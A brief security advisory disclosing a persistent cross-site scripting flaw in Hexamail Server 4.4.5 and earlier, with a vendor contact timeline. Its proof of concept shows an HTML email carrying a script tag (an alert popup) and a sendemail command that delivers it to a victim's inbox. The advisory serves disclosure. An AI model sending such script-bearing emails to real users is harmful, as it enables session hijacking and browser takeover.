Hexamail Server <= 4.4.5 Persistent XSS Vulnerability

Hexamail Server version 4.4.5 or below is vulnerable to a persistent cross-site scripting (XSS) via HTML email.

<Vulnerability Description

Hexamail Server suffers persistent XSS vulnerability in the mail body, allowing malicious user to execute scripts in a victim’s browser to hijack user sessions, redirect users, and or hijack the user’s browser.

Proof of concep

By sending a malicious script to the victim email, the webmail automatically load the mail body, so the script will be automatically executed without permission from user.

root@bt:~/# cat > meal.txt
<html>
<body>
<h1>XSS pop up</h1>
<script>alert('Hi, what is this?');</script>
</body>
</html>
root@bt:~/#

Send email to the victim:

root@bt:~/# sendemail -f [email protected] -t [email protected] -xu [email protected] -xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com

Vendor timeline

04/20/2012 – Issue discovered
04/20/2012 – Vendor contacted
04/27/2012 – Vendor respond and provides new upgrade version
04/30/2012 – Issue still affected on the latest upgrade version
04/30/2012 – Vendor said they still fixing the problem
05/10/2012 – Email sent to ask about the fix progress
06/02/2012 – No response. Sent to Secunia.

Solutio

Not available.